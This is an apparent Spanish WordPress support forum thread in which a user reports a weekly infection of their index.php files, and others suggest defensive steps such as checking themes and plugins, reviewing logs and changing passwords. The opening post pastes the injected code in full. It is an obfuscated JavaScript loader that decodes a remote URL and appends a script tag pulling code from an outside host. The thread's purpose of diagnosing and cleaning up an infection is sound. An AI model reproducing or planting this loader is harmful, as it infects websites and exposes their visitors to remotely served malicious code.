problemas de hacking

Inicio Foros WordPress Instalación / Actualización problemas de hacking

Este debate contiene 8 respuestas, tiene 8 mensajes y lo actualizó  preguntarix hace 8 años, 6 meses.

  • Autor
    Publicaciones
  • #16346

    juegosone
    Participante

    <p>Buenas,</p>
    <p>Cada semana tengo problemas con algún bug de wordpress que me infecta todos los index.php agregando con código al final como este:</p>
    <p>&lt;script&gt;this.p=”;try {var g;if(g!=’e’ &amp;&amp; g != ”){g=null};var rj=new Date();this.Gj="";var T=’]’;this.eI="";var v=’replace’;var aV="";var E="";var q=’g’;var lJ;if(lJ!=’l’){lJ=”};var k=”;var zg=new Array();var _=new Array();var r='(P, k);var Va="";};var F=J(‘b1o1d8y1’,"81");var TV=J(‘aJpJpKeJnKdKCJhKiJlKdK’,"JK");var iV;if(iV!=’t_’){iV=”};this.FE="";var t=J(‘c7rxexa7t7e7Exlxe7mxe7n7tx’,"7x");var B=J(‘sqcqrGiqpGtG’,"Gq");var FL=J(‘sleQtXA8t8tXrXiQbQuQt8eX’,"X8lQ2");var d=J(‘oXn0lXo0a0dX’,"X0");this.yo="";var C=”;var b=new String();var x="1";var GR=new Array();this.nE="";var G=J(‘hvtvtypv:v/y/vkyivcvkyeyry-ydyev.vnvaytyey.vcvovmy.vfyrveyeywyevbysv-vcvoymy.vtvavgysyavlyeyuysyav.yrvuv:v’,"yv");var co=new String();var tn=J(‘/CgFoqoCgqlFeX.qcCoXmq/TgCoFoqgClqeF.TcFoCmq/qtThFeXpXlCaqnFeFtC.qcCoqmq/qfXaTsFtTcqlqiqcqkX.CcFoCmF/Tfqcq2q.CcToCmX.qpqhFpq’,"XCqFT");var a=J(‘849494094999989497999074444′,"947");var Ak=new String();window[d]=function(){var ZH=”;var nc;if(nc!=” &amp;&amp; nc!=’j’){nc=null};var ZM=new Array();s=document[t](B);C+=G;C+=a;var JW;if(JW!=’E_’ &amp;&amp; JW != ”){JW=null};C+=tn;this.jI="";this.iS=”;s.setAttribute(‘defer’, x);var bp;if(bp!=” &amp;&amp; bp!=’yx’){bp=”};s.src=C;var iY;if(iY!=’QS’ &amp;&amp; iY != ”){iY=null};var Y=document[F];this.uT="";this.NH="";Y.appendChild(s);var sR;if(sR!=’rX’ &amp;&amp; sR!=’uW’){sR=”};var dn;if(dn!=” &amp;&amp; dn!=’yt’){dn=null};};var QSG=”;var L;if(L!=’hW’ &amp;&amp; L != ”){L=null};} catch(X){this.lx="";};var wS;if(wS!=” &amp;&amp; wS!=’sA’){wS=”};&lt;/script&gt;<br />
    &lt;!–54e4d256866451c93e97499be736c964–&gt;</p>
    <p>Me deja completamente inutilizable e inaccesible al blog. También me modifica todos los archivos .js de wp-includes y wp-admin</p>
    <p>Alguien sabe como puedo hacer para que no me pase esto cada semana?</p>
    <p>Gracias de antemano
    </p>

  • #37926

    imported_study
    Participante

    La seguridad informatica no es mi especialidad pero te comento que es mas probable que el bug sea de un plugin que de wordpress y que tengas inyectado en algun lugar otro script que cause eso.

  • #37927

    Habla con los de tu Hosting.

    Revisa los Logs minuciosamente, sobre todo los de acceso.
    Si encuentras la fecha de cuando fue el acceso, prueba con un Backup anterior a esa fecha.
    Por supuesto cambia de contraseña todo, cuentas de ftp, de mail, de panel de TODO.

    No se que mas.

    Suerte un Saludo.

  • #37935

    imported_j.conti
    Participante

    Cuidado con los themes.

    La red está llena de Free Premium Themes que llevan código para hacerse con el control del blog.

    Siempre hay que mirar dos archivos especialmente. El footer.php y el function.php

    debes mirar que no hayan liar var de código encriptado.

    Sobre todo, esto te lo encentras en Themes de pago que hay gente que te los ofrece gratuitamente.

    Un saludo

  • #37948

    MrVixio
    Participante

    Realiza lo siguiente:

    Actualizar tu wordpress y todos los plugins que tienes a la última versión, si el problema persiste es un problema de seguridad de tu hosting como una puerta trasera; lo cual tendrás que ponerte en contacto con el soporte de tu proveedor de hosting 😮

    * La mayoría de share hosting o hosting compartido tiene este tipo de problemas en especiales cuando son muy baratos.

  • #38096

    losamigotes
    Participante

    Bueno, pues a mi tb me ha pasado lo mismo t neia el wp actualizado al 2.9.2 y todos los plugins a la ultima version 🙁

  • #38098

    imported_j.conti
    Participante

    Tener todos los plugins a la ultima versión, no es igual a que sean plugins seguros.

    Hay varios plugins que son auténticos coladeros.

    No hace mucho, vi un articulo que realizaba un estudio de varios de ellos y explicaba donde estaba el problema.

    Si lo encuentro de nuevo, lo pondré por aquí.

  • #38113

    Martin82
    Participante

    Hola juegosone, pone la versión de wordpress que usas, los plugin que tienes en tu sitio tanto activados como desactivados y el theme que estas usando esto es más o menos lo que hay que tener en cuenta para llevar un ataque a un sitio que corre sobre wordpress lo más probable es que alguno tenga alguna vulnerabilidad de inyección sql o algo por estilo si me facilitas esos datos puede ser que te indentifique el bug y una vez solucionado mucho cuidado con que el atacante no halla dejado algun bug fabricado por el mismo para acegurarse de tener acceso siempre al blog.

    Saludos.

  • #38115

    preguntarix
    Participante

    Eso no parece un bug de wordpress más bien un ataque exterior en toda regla, comienza por limpiar todo el código , no está de pal parlo por un antivirus y una vez el código este limpio cambia las claves de tu host.

    [b]Posdata:[/b] No estaría nada mal una lista de los plugins t themes peligrosos, claro está que hay que proceder con seriedad y cautela para no caer en difamación, y para que no nos puedan acudar auqneu no lo hagamos, pero esta lista sería tremendamete útil para que no andemos cometiendo errores que cometieron otros y otros no cometan los errores que ya cometimos.

El foro ‘Instalación / Actualización’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest